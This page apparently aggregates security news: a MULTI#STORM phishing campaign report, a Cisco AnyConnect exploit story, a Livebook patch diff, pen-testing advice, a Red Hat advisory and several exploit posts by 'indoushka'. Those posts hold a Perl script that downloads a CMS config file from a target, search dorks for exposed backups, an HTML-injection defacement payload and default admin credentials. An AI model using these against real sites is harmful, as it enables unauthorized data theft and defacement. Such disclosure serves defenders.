A new phishing campaign codenamed MULTI#STORM has set its sights on India and the U.S. by leveraging JavaScript files to deliver remote access trojans on compromised systems.
"The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov

A new phishing campaign codenamed **MULTI#STORM** has set its sights on India and the U.S. by leveraging JavaScript files to deliver remote access trojans on compromised systems.

"The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said.

"Both are used for command-and-control during different stages of the infection chain."

The multi-stage attack chain commences when an email recipient clicks the embedded link pointing to a password-protected ZIP file ("REQUEST.zip") hosted on Microsoft OneDrive with the password "12345."

Extracting the archive file reveals a heavily obfuscated JavaScript file ("REQUEST.js") that, when double clicked, activates the infection by executing two PowerShell commands that are responsible for retrieving two separate payloads from OneDrive and executing them.

The first of the two files is a decoy PDF document that's displayed to the victim while the second file, a Python-based executable, is stealthily run in the background.

The binary acts as a dropper to extract and run the main payload packed inside it in the form of Base64-encoded strings ("Storm.exe"), but not before setting up persistence via Windows Registry modification.

Also decoded by the binary is a second ZIP file ("files.zip") that contains four different files, each of which is designed to bypass User Account Control (UAC) and escalate privileges by creating mock trusted directories.

Among the files is a batch file ("check.bat") that Securonix said shares several commonalities with another loader called DBatLoader despite the difference in the programming language used.

A second file named "KDECO.bat" executes a PowerShell command to instruct Microsoft Defender to add an antivirus exclusion rule to skip the "C:\\Users" directory.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

The attack culminates with the deployment of Warzone RAT (aka Ave Maria), an off-the-shelf malware that's available for sale for $38 per month and comes with an exhaustive list of features to harvest sensitive data and download additional malware such as Quasar RAT.

"It's important to remain extra vigilant when it comes to phishing emails, especially when a sense of urgency is stressed," the researchers said.

"This particular lure was generally unremarkable as it would require the user to execute a JavaScript file directly. Shortcut files, or files using double extensions would likely have a higher success rate."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

MULTI#STORM Campaign Targets India and U.S. with Remote Access Trojans

A ready-made, low-complexity path to pwning the popular enterprise VPN clients for remote workers is now circulating in the wild.

A security researcher has dropped a proof-of-concept (POC) exploit for a just-patched, high-severity security vulnerability in Cisco's client software for remote workers looking to connect to VPNs.

The bug (CVE-2023-20178) is an arbitrary file delete vulnerability in the Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows, which could allow authenticated attackers to escalate privileges to SYSTEM level with no user interaction.

As Cisco explained in its patch advisory earlier this month: "A vulnerability in the client update process of could allow a low-privileged, authenticated, local attacker to elevate privileges to those of SYSTEM. The client update process is executed after a successful VPN connection is established."

Security researcher Filip Dragović released an exploit that does just that via a public GitHub posting this week. It uses a process called "vpndownloader.exe," which is started in background when a user connects to a VPN using either the Cisco Secure or AnyConnect software.

"It will create directory in c:\\windows\\temp with default permissions," explained Dragović, who originally discovered the flaw and reported it to Cisco. "After creating this directory, vpndownloader.exe will check if that directory is empty, and if it's not, it will delete all files/directories in there. This behavior can be abused to perform arbitrary file delete as NT Authority\\SYSTEM account."

After that, cyberattackers can employ a known tactic to create a SYSTEM shell for abusing Windows Installer behavior and elevating privileges, he added.

Organizations should patch their clients immediately — while Cisco noted no known exploitation at the time of patching, that will likely quickly change with a PoC circulating in the wild. Successful exploitation is "noncomplex," according to the researcher, and the software has a history of being targeted by cyberattackers looking to take over data-rich VPN sessions.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Patch Now: Cisco AnyConnect Bug Exploit Released in the Wild

Livebook is a web application for writing interactive and collaborative code notebooks. On Windows, it is possible to open a `livebook://` link from a browser which opens Livebook Desktop and triggers arbitrary code execution on victim's machine. Any user using Livebook Desktop on Windows is potentially vulnerable to arbitrary code execution when they expect Livebook to be opened from browser. This vulnerability has been fixed in version 0.8.2 and 0.9.3.



Expand Up

@@ -300,6 +300,25 @@ defmodule Livebook.Utils do

"data:#{mime};base64,#{data}"

end

  

@doc """

Expands URL received from the Desktop App for opening in the browser.

"""

def expand\_desktop\_url("") do

LivebookWeb.Endpoint.access\_url()

end

  

def expand\_desktop\_url("/settings") do

to\_string(%{LivebookWeb.Endpoint.access\_struct\_url() | path: "/settings"})

end

  

def expand\_desktop\_url("file://" <> path) do

notebook\_open\_url(path)

end

  

def expand\_desktop\_url("livebook://" <> rest) do

notebook\_import\_url("https://#{rest}")

end

  

@doc """

Opens the given \`url\` in the browser.

"""

Expand All

@@ -316,10 +335,15 @@ defmodule Livebook.Utils do

  

{:unix, \_} \->

cond do

System.find\_executable("xdg-open") \-> {"xdg-open", \[url\]}

System.find\_executable("xdg-open") \->

{"xdg-open", \[url\]}

  

\# When inside WSL

System.find\_executable("cmd.exe") \-> {"cmd.exe", win\_cmd\_args}

true \-> nil

System.find\_executable("cmd.exe") \->

{"cmd.exe", win\_cmd\_args}

  

true \->

nil

end

end

  

Expand Down

CVE-2023-35174: Merge pull request from GHSA-564w-97r7-c6p9 · livebook-dev/livebook@2e11b59

From hardening Windows systems to adding access control and segmenting the network, there are steps organizations can take to better secure corporate data.

Having been in the cybersecurity industry since the early '90s, I've witnessed its transformation over many years. Today, my team conducts extensive research and testing to uncover vulnerabilities that organizations often overlook. We've successfully breached the networks of major companies in North America and identified security gaps that could have led to catastrophic consequences if left unmitigated.

In this article, I will share the top three tips that every organization must implement to secure their data and protect themselves from potential attacks based on our daily assessments and discoveries.

**1\. If Your Network Isn't Segmented, It's Not Secure**

Cybersecurity experts preach the benefits of network segmentation, but according to data cited by CIO, only 25% of organizations implement it. If you don't have a logical separation between your most critical information and your everyday employees, you're going to have a hard time securing your network.

To secure corporate data, organizations need to have configurations in place on any floor and office space that touches network ports. Doing so will prevent someone from accessing the network from any device. Even seemingly harmless devices such as printers can pose a threat to a network. During a physical penetration test we were asked to conduct for a large airline, the consultant was able to gain physical access to the airline's internal network via a printer at the gate, all without encountering any employee intervention.

To prevent unauthorized access, it's vital to implement access controls such as passwords or user authentication, as well as keeping firmware up to date to address any known vulnerabilities. And if the corporate backup solution is easily accessible to you, then it's easily accessible to threat actors who can delete the backups and detonate ransomware. In the airline example, network segmentation would isolate printers from other parts of the network to limit the potential impact of a security breach. 

Firewall access controls should be established between internal network segments to limit access to network resources in the event of an attack. Physical or logical access control should also be implemented to prevent unauthorized physical access to devices.

So, keep your devices in check (and your printers) and your network will thank you for it.

**2\. Modernize Your Network as Much as You Can Afford**

Over the past 30 years, Microsoft has made significant strides in the security of Windows and Windows networking. However, the Windows operating system still supports out-of-the-box legacy solutions that go back to Windows 95 — if not further, to Windows for Workgroups. If you've invested in modern operating systems such as Windows 10 or 11, or Windows Server 2016 or newer, there is no reason to continue to support these legacy solutions. By enabling "native mode domain," you can disable all the backward compatibility that may be weakening your network security and immediately enhance the security of your network. 

Companies can better reduce their security risks by eliminating their reliance on "end of life" solutions. Invest in upgrading legacy systems and ensure that all system software is patched through a vulnerability management and remediation program.

**3\. Greater Visibility Into Threat Vectors Through Content Filtering **

To improve your firewall's visibility into traffic leaving your environment, ensure that you have content visibility to block potential threats. The first question to ask is whether your employees are on the corporate network. A work-from-home culture may not scale well for you. However, there's no reason for your server systems to have unrestricted access to the Internet. Leveraging solutions such as content filtering can help you control the type of sites that could be accessed while an attacker is attempting to exploit your organization. For instance, blocking access to Mega.io and other common file-sharing sites used by ransomware threat actors is effective in stopping data exfiltration.

For employees in a work-from-home culture, content-filtering options such as Zscaler or even DNS monitoring solutions such as Umbrella from Cisco are useful not only for controlling the type of websites that corporate devices can access from outside of the building, but also for providing monitoring capabilities in case an employee falls victim to a phishing attack. Corporate assets should still be under the control of the organization, even if they're being used outside the traditional office environment.

Companies can no longer afford to take their eye off the ball when it comes to security measures — even basic protections such as firewalls are only minimally effective at intervening in today's potential threat levels. I cannot stress enough the importance of implementing these three things to be a step ahead of attackers and have visibility into your entire environment.

Lessons From a Pen Tester: 3 Steps to Stay Safer

Red Hat Security Advisory 2023-3740-01 - This release of Camel for Spring Boot 3.20.1.P1 serves as a replacement for Camel for Spring Boot 3.20.1 and includes bug fixes and enhancements, which are documented in the Release Notes linked in the References. The purpose of this text-only errata is to inform you about the security issues fixed. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Integration Camel for Spring Boot 3.20.1 Patch 1 release security update  
Advisory ID:       RHSA-2023:3740-01  
Product:           Red Hat Integration  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3740  
Issue date:        2023-06-21  
CVE Names:         CVE-2023-20883 CVE-2023-24815   
=====================================================================

1. Summary:

Red Hat Integration Camel for Spring Boot 3.20.1 Patch 1 release and  
security update is now available.

Red Hat Product Security has rated this update as having an impact of  
Important. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

This release of Camel for Spring Boot 3.20.1.P1 serves as a replacement for  
Camel for Spring Boot 3.20.1 and includes bug fixes and enhancements, which  
are documented in the Release Notes linked in the References. The purpose  
of this text-only errata is to inform you about the security issues fixed.

Security Fix(es):

* vertx-web: StaticHandler disclosure of classpath resources on Windows  
when mounted on a wildcard route (CVE-2023-24815)

* spring-boot: Spring Boot Welcome Page DoS Vulnerability (CVE-2023-20883)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2209342 - CVE-2023-20883 spring-boot: Spring Boot Welcome Page DoS Vulnerability  
2209400 - CVE-2023-24815 vertx-web: StaticHandler disclosure of classpath resources on Windows when mounted on a wildcard route

5. References:

https://access.redhat.com/security/cve/CVE-2023-20883  
https://access.redhat.com/security/cve/CVE-2023-24815  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=red.hat.integration&version=2023-Q2

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJNxFdzjgjWX9erEAQjgyg/8DIsEGsp2KcG+EMZiGqVlBaafePfT3gP6  
tVOVD4jqsxQYLNa05/IZQtW5Do+0q1vF+ElMq073BgiTXzx6dvD2gppr+Z4DJfAt  
tvigw2uRofa+ycyL7LxtguxuwUEOrroEiCSqV5itQ/VKiPGoWbQ9WW7LJqPoL/l3  
bOywYNbjQ9DIruTwaWt5YbdzYeCPiyh1lW+pG5wzci7m2DZoRu4mR+cV+XsY0XRS  
cGS5UtE60bXpid5CUFVKno26ArmY1twpb3hB8cX2xrjwa9xOpfteffdqp6bLM9Fv  
CfnjBSJLRiOIucR2d3jgWaMFsQlfpxRGfp/1fT9bI3RJ5RO2p0BHUS4ECAeCXCNW  
PhrmMfHKthHeQKSNpWPTKt+XgO1jE8qMATic5/hB3PL6w2KqFs8mSWePrhD3Vo1J  
SktXfBa3Sd1V3TbOz2otcifMCzg7ry95+sSR72Zpu/nQfP+keOsian98FdRlGzV5  
Hh2l98+YgdtmNFp4rwrVCcOLluv/rzt7oG1UBYVM9ATV50fXqtU8KR7YRS3ooNj3  
kaHBDTsUpqdl+iN25jpeDooLZkCKPcGsm7Pg6bUFjYkIHavxFwve9hVxXp9yiVL6  
446ILywCJFF2/hsD7o0Pe4r6Gc9le6zh7C/6kqa+hb1k9aGtcwFnMaNK1H2Y3zni  
4j/W1dDwivU=  
=xseK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3740-01

WordPress BackUpWordPress version 3.8 appears to leave backups in a world accessible directory under the document root.

    ====================================================================================================================================| # Title     : WordPress BackUpWordPress 3.8 Plugins Backup Disclosure Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://wordpress.org/plugins/backupwordpress/                                                                     |  | # Dork      : "/wp-content/backupwordpress- "                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave backups in a world accessible directory under the document root.[+] Use Dork : "/wp-content/backupwordpress- "[+] The search result gives you some websites that took earlier a Wordpress backup.[+] http://127.0.0.1/WordPress3/wp-content/backupwordpress-89c0bd0079-backups/====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

WordPress BackUpWordPress 3.8 Backup Disclosure

Zstore version 6.5.4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : Zstore version 6.5.4 Database Disclosure Exploit                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : https://github.com/leon-mbs/zstore/releases/tag/6.5.4                                                              |    
| # Dork      : "Zippy склад"                                                                                                      |  
====================================================================================================================================

poc :

[-] Download database backup :

    This file may disclose sensitive information. This information can be used to launch further attacks.

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
# Author : indoushka

use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print "\n[+] Zstore version 6.5.4  Database Disclosure [+] \n\n";  
system('color a');

if(@ARGV < 2)  
{  
print "[+] Author : indoushka \n\n";  
print "[-] How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/db.sql \n";  
print "[+] usage2 : perl $0 localhost /db.sql \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="config/config.ini";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/db.sql");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/.env\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Zstore 6.5.4 Database Disclosure

Ad Manager Pro version 3.05 suffers from a backup disclosure vulnerability.

    ====================================================================================================================================| # Title     : Ad Manager Pro 3.05 Backup Disclosure Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : http://www.P30vel.ir                                                                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================P0C :[+] appears to leave backups in a world accessible directory under the document root & The plugin exports a backup exported as a text file and contains sensitive informations.[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /admanager/data/[+] https://127.0.0.1/localhost/admanager/data/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

Ad Manager Pro 3.05 Backup Disclosure

Active Matrimonial CMS version 1.4 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Active Matrimonial CMS v 1.4 HTML inject Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://activeitzone.com/                                                                                          |  | # Dork      : "Copyright © 2019 Active Matrimonial CMS - All Rights Reserved "                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register new member .[+] Go to edit your profil http://127.0.0.1/xywarscom/home/profile[+] in Introduction box , put your code or use this code for test :<marquee><font color=lime size=32>Hacked by indoushka</font></marquee></tr><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a></tr>====Greetings to :===================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |=====================================================================================================================================

Active Matrimonial CMS 1.4 HTML Injection

Acon Architecture and Construction Website CMS version 1.2 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Acon - Architecture and Construction Website CMS v1.2 Insecure Settings Vulnerability                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.mother-of-mangrove.com/xicia/cc/acon/                                                                  |  | # Dork      : Acon - Building and Architecture Website CMS                                                                       |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+]  Dorking In Google Or Other Search Enggine .[+]  use login : Username: admin@gmail.com & Password: 1234 [+]  http://127.0.0.1/www/demoslycom/xicia/cc/acon/admin/  ====Greetings to :===================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |=====================================================================================================================================

Tag

#windows